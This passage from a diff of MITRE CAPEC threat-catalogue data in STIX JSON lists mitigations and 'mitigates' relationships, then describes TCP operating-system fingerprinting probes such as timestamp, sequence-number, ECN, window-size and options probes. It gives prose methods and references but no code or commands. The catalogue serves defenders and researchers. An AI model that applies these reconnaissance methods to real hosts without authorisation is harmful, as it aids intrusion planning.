", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation." + ], + "x_capec_resources_required": [ + "Ability to send HTTP post to scripting host and collect output" + ], + "x_capec_skills_required": { + "High": "Exploiting any information gathered by HTTP Query on script host", + "Low": "To place malicious payload on server via HTTP" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cc8dc0d-4869-4cb5-8228-263779929d0c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.", + "id": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39f61c35-1731-4cb8-a8eb-bcd81960df63", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b600559a-7621-438f-92e9-088c3cdf5117", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00dd576f-a986-4094-aa7c-3eb1b57dc7d3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc0ab859-a9fe-4f70-a2f6-4e43fa7ba77b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Session tokens for specific host", + "id": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df6702e1-0cee-4251-8188-443a16f750d1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5e5619cd-3104-4816-91eb-2836496ecc8c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode", + "id": "course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b1356d6-39be-4183-9bbf-e8fa5b7f799e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.", + "external_references": [ + { + "external_id": "CAPEC-320", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/320.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15fddec-fd55-4c0b-8681-4e57ba5bc20d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Timestamp Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if timestamps are present.: The adversary sends a probe packet to the remote host to identify if timestamps are present.

Experiment

  1. Record and analyze timestamp values.: If the remote host is using timestamp, obtain several timestamps, analyze them and compare them to known values.

    2. Techniques
    The adversary sends several requests and records the timestamp values.
    The adversary analyzes the timestamp values and determines an average increments per second in the timestamps for the target.
    The adversary compares this result to a database of known TCP timestamp increments for a possible match.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.", + "external_references": [ + { + "external_id": "CAPEC-321", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/321.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--cd7d1252-30ed-4ba1-a334-52f7a8b7c748", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Sequence Number Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.", + "external_references": [ + { + "external_id": "CAPEC-322", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/322.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Greatest Common Divisor Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.", + "external_references": [ + { + "external_id": "CAPEC-323", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/323.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4ac0eeac-2467-403a-9c64-be3a7b3f3083", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Counter Rate Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the \"connected\" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-326", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4dd22c6-ad54-47c8-b0ab-d7f3cad9e026", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Initial Window Size Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.", + "external_references": [ + { + "external_id": "CAPEC-327", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c0ad20d0-8b30-460c-a060-da46582bdbec", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Options Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and 